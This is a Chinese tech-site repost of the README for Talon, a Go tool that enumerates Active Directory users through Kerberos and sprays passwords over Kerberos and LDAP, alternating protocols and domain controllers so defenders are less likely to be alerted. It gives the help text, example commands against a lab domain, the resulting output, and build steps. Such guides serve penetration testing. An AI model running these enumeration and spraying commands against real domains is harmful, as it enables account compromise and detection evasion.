溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

針對(duì)Kerberos和LDAP服務(wù)的密碼爆破工具Talon是怎樣的

發(fā)布時(shí)間:2021-12-24 14:51:21 來(lái)源:億速云 閱讀:174 作者:柒染 欄目:網(wǎng)絡(luò)安全

針對(duì)Kerberos和LDAP服務(wù)的密碼爆破工具Talon是怎樣的,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

Talon

Talon是一款針對(duì)Kerberos和LDAP服務(wù)的密碼爆破工具,該工具能夠在保持在無(wú)法被檢測(cè)到的情況下執(zhí)行自動(dòng)化的密碼爆破攻擊。Talon能夠枚舉Kerberos用戶(hù)列表,并識(shí)別出有效的用戶(hù)角色。除此之外,Talon還可以針對(duì)Kerberos和LDAP Secure服務(wù)來(lái)執(zhí)行密碼爆破攻擊。Talon能夠使用一個(gè)或多個(gè)域控制器來(lái)執(zhí)行這些攻擊,并且能夠?qū)崿F(xiàn)域控制器和服務(wù)(Kerberos或LDAP Secure)之間的請(qǐng)求隨機(jī)化。

工具下載

廣大研究人員可以訪問(wèn)該項(xiàng)目的【Releases頁(yè)面】來(lái)下載對(duì)應(yīng)操作系統(tǒng)架構(gòu)的Talon。

針對(duì)Kerberos和LDAP服務(wù)的密碼爆破工具Talon是怎樣的

工具使用

$ ./Talon -h

Usage of ./Talon:

  -D string

     Fully qualified domain to use

  -E Enumerates which users are valid

  -H string

     Domain controller to connect to

  -Hostfile string

     File containing the list of domain controllers to connect to

  -K Test against Kerberos only

  -L Test against LDAP only

  -O string

     File to append the results to

  -P string

     Password to use

  -U string

     Username to authenticate as

  -Userfile string

     File containing the list of usernames

  -debug

     Print debug statements

  -sleep float

     Time inbetween attempts (default 0.5)

枚舉模式

用戶(hù)枚舉模式可以使用-E選項(xiàng)來(lái)執(zhí)行,該模式下的Talon只會(huì)向目標(biāo)目標(biāo)KDC發(fā)送Kerberos TGT預(yù)認(rèn)證請(qǐng)求,不過(guò)這個(gè)請(qǐng)求目前使用的是不支持的加密類(lèi)型。Talon將會(huì)檢查KDC返回的響應(yīng)信息,并判斷其中是否包含KDC_ERR_ETYPE_NOSUPP(表明用戶(hù)存在)或DC_ERR_C_PRINCIPAL_UNKNOWN(表明用戶(hù)不存在)。Talon能夠針對(duì)目標(biāo)企業(yè)中的多個(gè)域控制器來(lái)執(zhí)行這種類(lèi)型的枚舉操作,使用-Hostfile命令即可指定多個(gè)域控制器,或使用-H來(lái)指定單個(gè)域控制器。這項(xiàng)技術(shù)并不會(huì)觸發(fā)登錄失敗的情況,因此不會(huì)鎖定任何用戶(hù)賬號(hào)。

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

 

[-]  172.16.144.195 STARLABS.LOCAL\asmith:  = User Does Not Exist

[+]  172.16.144.185 STARLABS.LOCAL\ballen:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\bjohnson:  = User Does Not Exist

[-]  172.16.144.195 STARLABS.LOCAL\bwayne:  = User Does Not Exist

[+]  172.16.144.195 STARLABS.LOCAL\csnow:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\jtodd:  = User Does Not Exist

[+]  172.16.144.186 STARLABS.LOCAL\hwells:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\wwest:  = User's Account Locked

自動(dòng)化密碼爆破模式

Talon針對(duì)的是Kerberos和LDAP,這兩個(gè)服務(wù)都整合進(jìn)了活動(dòng)目錄AD中以實(shí)現(xiàn)身份認(rèn)證。Talon能夠通過(guò)在這兩個(gè)服務(wù)之間交替執(zhí)行密碼爆破攻擊,從而實(shí)現(xiàn)在兩個(gè)協(xié)議之間分割密碼攻擊流量。這會(huì)拆分生成的潛在事件數(shù)量,從而減少發(fā)出警報(bào)的幾率。Talon更進(jìn)一步,通過(guò)使用-Hostfile向企業(yè)中的多個(gè)域控制器分發(fā)密碼攻擊,每次在LDAP和Kerberos之間交替,以創(chuàng)建額外的模糊層。如果需要,可以使用-H命令提供單個(gè)域控制器。

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

                

[-]  172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed

[-]  172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed

[-]  172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed

[+]  172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success

[-]  172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed

Talon還可以使用-K選項(xiàng)或-L選項(xiàng)來(lái)進(jìn)隊(duì)Kerberos或LDAP執(zhí)行滲透攻擊。

除此之外,在執(zhí)行密碼爆破攻擊的過(guò)程中,Talon還可以使用Kerberos和LDAP來(lái)讀取響應(yīng)信息。Talon能夠在執(zhí)行密碼破解攻擊的過(guò)程中,通過(guò)讀取每一次密碼請(qǐng)求嘗試返回的響應(yīng)碼來(lái)檢測(cè)賬號(hào)鎖定情況,這將幫助我們防止在企業(yè)內(nèi)部網(wǎng)絡(luò)進(jìn)行測(cè)試的時(shí)候出現(xiàn)賬號(hào)被鎖定的情況,以避免被檢測(cè)到。

root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

 

[-]  172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed

[-]  172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed

[-]  172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked

[*] Account lock out detected - Do you want to continue.[y/n]:

代碼貢獻(xiàn)

Talon基于Golang開(kāi)發(fā),如需貢獻(xiàn)自己的代碼,首先請(qǐng)將該項(xiàng)目代碼庫(kù)克隆至本地。在編譯Talon之前,我們還需要安裝好相應(yīng)的依賴(lài)組件。請(qǐng)先運(yùn)行下列命令:

go get github.com/fatih/color

go get gopkg.in/jcmturner/gokrb5.v7/client

go get gopkg.in/jcmturner/gokrb5.v7/config

go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID

go get gopkg.in/ldap.v2

接下來(lái),運(yùn)行下列命令實(shí)現(xiàn)項(xiàng)目構(gòu)建:

go build Talon.go

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI